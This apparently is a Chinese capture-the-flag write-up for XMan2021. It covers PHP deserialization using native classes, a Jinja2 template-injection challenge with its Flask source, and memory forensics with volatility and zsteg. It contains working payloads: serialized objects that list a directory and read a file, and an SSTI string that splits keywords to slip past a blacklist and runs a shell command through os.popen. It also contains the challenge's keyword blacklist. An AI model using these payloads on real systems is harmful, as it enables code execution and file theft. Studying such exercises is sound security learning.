内容纲要
XMan2021
easyphp
这个反序列化是原题,利用php原生类
原题:
[DASCTF]ez_serialize-PHP 原生类的利用_cjdgg的博客-CSDN博客
PHP内置类的遍历
get_declared_classes();
使用 Error/Exception 内置类进行 XSS
Error 内置类
Exception 内置类
使用 Error/Exception 内置类绕过哈希比较
Error类
Exception 类
使用 SoapClient 类进行 SSRF
SoapClient 类
使用 SoapClient 类进行 SSRF
使用 SimpleXMLElement 类进行 XXE
SimpleXMLElement 类
使用 ZipArchive 类来删除文件
ZipArchive 类
PHP 原生文件操作类
可遍历目录类
DirectoryIterator 类
FilesystemIterator 类
GlobIterator 类
可读取文件类
SplFileObject
payload:
O:4:"XMAN":3:{s:5:"class";s:18:"FilesystemIterator";s:4:"para";s:13:"/var/www/html";s:5:"check";N;}
O:4:"XMAN":3:{s:5:"class";s:13:"SplFileObject";s:4:"para";s:37:"/var/www/html/xxxXXXmMManNNn/f1a4.php";s:5:"check";N;}
SSTI
原题,网上很多WP都抄来抄去的,没有营养
我的payload:
% print(lipsum.__globals__['__bui'+'ltins__']['ev'+'al']('__imp'+'ort__("o'+'s").po'+'pen("cat /flag_1s_Hera").read()')) %
源码
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import Flask, render_template, render_template_string, request
app = Flask(__name__)
@app.route("/", methods=["GET", "POST"])
@app.route("/index.php", methods=["GET", "POST"])
def index():
def safe_filter(s):
blacklist1 = ["{import","{getattr","{os","{class","{subclasses","{mro","{request","{args","{eval","{if","{for","{subprocess","{file","{open","{popen","{builtins","{compile","{execfile","{from_pyfile","{local","{self","{item","{getitem","{getattribute","{func_globals","{config"]
blacklist_strong = blacklist1 + ["{{", "}}"]
for no in blacklist_strong:
if no in s:
return "1"
else:
continue
blacklist = ["import","getattr","os","class","subclasses","mro","request","args","eval","if","for"," subprocess","file","open","popen","builtins","compile","execfile","from_pyfile","local","self","item","getitem","getattribute","func_globals","config"]
for no in blacklist:
while True:
if no in s:
s =s.replace(no,"")
else:
break
return s
if request.method == "POST":
name = request.form["name"]
template = "hello {}!".format(name)
name1 = render_template_string(safe_filter(template))
print name1
if name1 == "1":
template1 = u"""
<strong>Parse error:</strong> syntax error, unexpected T_STRING, expecting "{" in <strong>\\var\\WWW\\html\\test.php</strong> on line <strong>13</strong>
"""
return render_template_string(template1)
else:
return render_template("index.html", name=name1)
if request.method == "GET":
return render_template("index.html")
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80, debug=False)volatility
> .\volatility.exe -f mem --profile=WinXPSP2x86 cmdscan
Volatility Foundation Volatility Framework 2.6
**************************************************
CommandProcess: csrss.exe Pid: 600
CommandHistory: 0x2e3a508 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 18 LastAdded: 17 LastDisplayed: 17
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x198
Cmd #0 @ 0x55b548: cd C:\Documents and Settings\Administrator\??\MISC
Cmd #1 @ 0x2dd7a20: winpmem_v3.3.rc3.exe -dd -o memdump.raw --format --volume_format raw
Cmd #2 @ 0x55b8a8: winpmem_v3.3.rc3.exe -dd -o memdump.raw --format raw --volume_format raw
Cmd #3 @ 0x55b3f0: can you find this?
Cmd #4 @ 0x5524b8: yes
Cmd #5 @ 0x2e39400: please go on
Cmd #6 @ 0x2e39a80: haha
Cmd #7 @ 0x2e01170: flag is down
Cmd #8 @ 0x2e02110: flag{xixixixix_Llalala_leizeNiuBi}
Cmd #9 @ 0x2e02f60: winpmem_v3.3.rc3.exe -dd -o memdump.raw --format raw --volume_format raw
Cmd #10 @ 0x2e3a130: waw
Cmd #11 @ 0x2e3a1d8: jpg?????????????????????????????????????????????????
Cmd #12 @ 0x2e3dd80: ?
Cmd #13 @ 0x55b878: nonono it is png
Cmd #14 @ 0x55c778: just check the pixel!
Cmd #15 @ 0x55d1d8: !!!!!!!
Cmd #16 @ 0x2e3a028: !!!!!!
Cmd #17 @ 0x2dd7ad0: winpmem_v3.3.rc3.exe -dd -o memorydump.raw --format raw --volume_format raw
**************************************************
CommandProcess: csrss.exe Pid: 600
CommandHistory: 0x2e3ad88 Application: winpmem_v3.3.rc3.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x624
>.\volatility.exe -f mem --profile=WinXPSP2x86 filescan | findstr 'png'
Volatility Foundation Volatility Framework 2.6
0x000000000a283498 1 0 R--rwd \Device\HarddiskVolume1\Documents and Settings\Administrator\???\MISC\res.png
0x000000000a365cb0 1 0 RW-rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\Recent\res.png.lnk
0x00000000a3436498 1 0 R--rwd \Device\HarddiskVolume1\Documents and Settings\Administrator\???\MISC\res.png
0x00000000a3bc9cb0 1 0 RW-rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\Recent\res.png.lnkzsteg
zsteg *.png --all
[?] 3101 bytes of extra data after image end (IEND), offset = 0xa93e3
extradata:0 .. ["\x00" repeated 3101 times]
imagedata .. file: SVr4 curses screen image, big-endian
b2,r,lsb,xy .. file: VISX image file
b2,r,msb,xy .. file: 5View capture file
b2,bgr,lsb,xy .. file: PGP Secret Sub-key -
b3,bgr,lsb,xy .. file: MPEG-4 LOAS
b4,r,lsb,xy .. text: "wwwwfeUDDDDDeTC23333\"\"\"\"\"\"\"\"3333\"\"\"\""
b4,r,msb,xy .. text: ["D" repeated 8 times]
b6,bgr,msb,xy .. file: PGP Secret Sub-key -
b8,r,lsb,xy .. text: "\"\#$$$%%%&&&&&&&&))))))))********,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,-./0000/////////////////////////"
b8,r,msb,xy .. text: ["8" repeated 8 times]
b1,r,msb,xy,prime .. file: Apple DiskCopy 4.2 image \3620GO\003<, 2029788928 bytes, 0x38000000 tag size, 0xfe encoding, 0xff format
b4,r,lsb,xy,prime .. text: "wuDB3\"32 "
b4,r,msb,xy,prime .. text: ";3333333"
b8,r,lsb,xy,prime .. text: "$%&))*,,,,,00////44444444444455555555554444555442200000-----///-----------,,,,,,,,,,,,,,,///////000000000000222222222222222224220/,,,,,%$#"
b8,r,msb,xy,prime .. text: ["," repeated 12 times]
b1,b,lsb,yx .. file: Zip archive data, at least v2.0 to extract
b2,r,lsb,yx .. file: VISX image file
b2,r,msb,yx .. file: 5View capture file
b2,b,msb,yx .. text: "]UUUUUUUWUUW_]"
b2,bgr,lsb,yx .. file: PGP Secret Sub-key -